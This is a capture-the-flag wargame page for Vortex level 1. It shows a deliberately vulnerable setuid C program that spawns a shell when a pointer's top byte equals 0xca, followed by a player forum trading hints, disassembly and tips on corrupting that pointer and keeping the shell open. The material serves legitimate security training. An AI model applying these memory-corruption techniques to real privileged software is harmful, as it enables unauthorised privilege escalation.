Vortex Level 1
- Canary Values
- We are looking for a specific value in ptr. You may need to consider how bash handles EOF..
- Reading Material
- Smashing the Stack for Fun and Profit
Source Code: level1.c :
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }
void print(unsigned char *buf, int len)
{
int i;
printf("[ ");
for(i=0; i < len; i++) printf("%x ", buf[i]);
printf(" ]\n");
}
int main()
{
unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
unsigned int x;
while((x = getchar()) != EOF) {
switch(x) {
case '\n': print(buf, sizeof(buf)); continue; break;
case '\\': ptr--; break;
default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
}
}
printf("All done\n");
}
Ack! I just solved it!
shouts to whoever created these wargames because i learned alot
You know what took me so long to solve it? Let's just say that if I were to eat a stack of pancakes, I would put the syrup down first and then lay down the pancakes. ;)
plus all that stuff about terminal emulators converting my magic character into a two byte. i don't really understand that but oh well
Next steps
So I got my shell, but I'm not sure what to do with it. Is there a password I'm supposed to get? How?
read MOTD carefully
read MOTD carefully
I did, but the fact remains
I did, but the fact remains that I still have the vortex1 uid, and so I don't have permission to get at the next level's password. I even tried hard-coding the uid of vortex2, but when the shell opens, I'm still vortex1. Although I don't even know if that's supposed to work - I'm pretty noob at this.
EDIT: Oh wait, n/m. I hadn't realized that the scratch space directory wasn't the intended escalation path. *facepalm*
To obtain answers quickly,
To obtain answers quickly, join irc.pulltheplug.org channel #vortex
So long, and thanks for all the fish!
Login Error
I got the username and pwd from level 0, I enter them but it seems that it will not accept my pwd. I have entered multi times checking for case as well but to no avail.
After 3 times get
Permisson Denied (publickey, keyboard-interactive)
I tried it from a dif computer and it works from there, maybe i entered the username wrong the first time by accident, how do i re-enter my username it does not ask me for it when i try again
Any ideas.
Re: Login Error
Just watch the level0 video and see what are you doing wrong.
So long, and thanks for all the fish!
I'm on vortex1, and there
I'm on vortex1, and there doesn't seem to be any problem to solve. Is the puzzle supposed to be in the /home/vortex/vortex1 directory or what?
Read the welcome screen. It
Read the welcome screen. It says:
Vortex information can be found in /vortex. Additional information on
Vortex can be found in /vortex/README
So long, and thanks for all the fish!
help noob Qestion.
the first lvl was ok, this one i am having a little trouble with just a beginner question really is there anywhere that we have write permission so that we can save this code and compile it? i can log in to vortex but when i copy the source and try to save it the /tmp folder and the /var/tmp folder are restricted and i haven't come across a folder with write access. it is probably something simple that i am overlooking any help would be great.
Create a directory in /tmp
Create a directory in /tmp with a hard to guess name.
You are denied listing the content of /tmp - but you can make your own dir there.
mkdir /tmp/thenameyoulikeIn this dir you'll have full write-access. Since listing the content of /tmp is forbidden, you can save your progress in your dir.
Just don't forget the name of it.
darkelf
Some tiny help please :-)
Hi there,
I'm somewhat stuck with this level. I thought it would be an easy task, but now I'm losing lots of hair while working on it.
I hope I don't reveal to much, by saying that I tried to exploit the "ptr--;" and "ptr++[0] = x;"-part.
I lowered the ptr-value so that it points to itself and overwrote the MSB with 0xca. So far, so good I thought - but actually it was not.
The reason is, that before I write the new value to ptr, the original value is stored in EDX and will be restored after the change.
See here:
-0x80485ed mov eax,DWORD PTR [ebp-0x10] #load the value of x into eax
-0x80485f0 mov BYTE PTR [edx],al #move the x-value to the place ptr is pointing to
-0x80485f2 lea eax,[edx+0x1] #load the original ptr-value + 1 into eax
-0x80485f5 mov DWORD PTR [ebp-0x214],eax #value of ptr will be restored (+1), changes are gone :(
Since I don't know, how to circumvent that behavior, I want to ask if I'm on the right track anyway.
Any help is most appreciated.
Thanks a lot in advance.
darkelf.
P.S. a forum would be useful :-)
Try to read your 5 lines a
Try to read your 5 lines a couple more times... Whats being restored and do you need it actually?
So long, and thanks for all the fish!
Edited:
Oops!
Where you got that asm code? I see completely different /vortex/level1 code snippet:
0x0804854e : mov -0x20c(%ebp),%eax // ptr
0x08048554 : mov %eax,%edx // keep ptr
0x08048556 : mov -0x210(%ebp),%al // x value
0x0804855c : mov %al,(%edx) // ptr[0] = x
0x0804855e : lea -0x20c(%ebp),%eax // &ptr
0x08048564 : incl (%eax) // ptr++
First of all, thanks a lot
First of all, thanks a lot for your help.
The asm code is taken straight out of gdb.
My gdb is set (via .gdbinit) to show asm code in Intel-syntax, because I dislike at&t-syntax (find i t harder to read).
I copied the sourcecode above and compiled it with gcc (version 4.2.3) on a Debianbox.
The two snippets are pretty alike but not equal. I don't know so far if this is the problem.
I will compile the source again - this time on vortex.
Again, thank you. I'm pretty sure it wasn't my last question.
darkelf
\\\\\\\\\\\\\\\\...
edit:
strange thing! It seems that it was really a compiler issue. I compiled the source on vortex, which has gcc 3.4.6 and my string worked out of the box. Happy me :-)
Congrats! See you at level 9
Congrats! See you at level 9 where I stuck completely blind :( Even can't find a problem to solve...
So long, and thanks for all the fish!
Thanks.
Thanks.
I will hurry up to meet you there ;-)
I'm currently working on level 3. lev2 was really not that complicated.
I like this game. Since I was mainly in RCE-stuff before, I have to read lots of papers now to get into this.
See ya.
darkelf
wtf??
hallo!
I think I exploit the level,but that's what I get :
sh-3.2$ exit
I can get the shell,but I can't use it, the shellprompt just "exit()s" :-P
wtf is this?
I faced the similar problem
I faced the similar problem at level 1, input redirection didn't worked for me, so I just ran /vortex/level1 and then copypasted required string
So long, and thanks for all the fish!
copypaste not working :-S
yeah,
My shell always exit()'s, and copypaste doesn't work for me... soooo I think i got a problem!
so extrange this /bin/sh beavour!
anyone can find this out?
thx
Try it in rxvt
I had the same problem. I couldn't convince my terminal to send the character I pasted - it was always escaped to 2 bytes (c3 8a). I was able to run the exploit by piping my input to stdin, but telling bash to ignore eof didn't stop the shell exiting immediately.
gnome-terminal and xterm both failed to paste my input as-is, so I tried rxvt and _finally_ got this to work.
Hmmm! Can I see your string?
Hmmm!
Can I see your string? email it to beeblbrx^mail.ru
(replace ^)
So long, and thanks for all the fish!
I'm unable to connect to the ssh :(
I'm trying to connect to 69.55.233.89 using putty.
When i'm writing the user name and password that i've got from level 0 the terminal session is stuck(when i click enter nothing is being print out in).
And when i'm trying to reconnect i don't event get a chance to write a username and password(after few hours it's fixed)
Am I doing something wrong? or is there a bug in the server out there?
I blame the server
Mate, you're getting further than me. When I try connecting I get a blank screen for a while and then PuTTY says that the server closed the connection, I don't even get offered the chance to try a username/password.
**Groupies Required**
Damn those servers
Always trying to fail us!
hex character
what character do i need to type to get a 0xca? I've looked everywhere and all i can find is Ê but when i type it it is not 0xca but 0xc3 0x8a.
Read the code again
You are missing something :)
what file to exploit?
i think i know how to exploit this prog and also connected to vortex1@vor......
but i see nothing to exploit???
also ptr++[0]=x in my compiler compiles to somethin like this: s=ptr+1; ptr[0]=x; ptr=s;
--
There are 10 type of people in the world those that know binary and those that don’t
Compile error
bt VORTEX # gcc 1.c -o level1
1.c:8: error: expected identifier or '(' before 'if'
1.c:38:2: warning: no newline at end of file
I'm a newbie at c but I think there is something wrong with that define syntax thing.
Compile error
It appears it wasn't pasted into the form correctly, I'll edit it and update it.
Thanks :)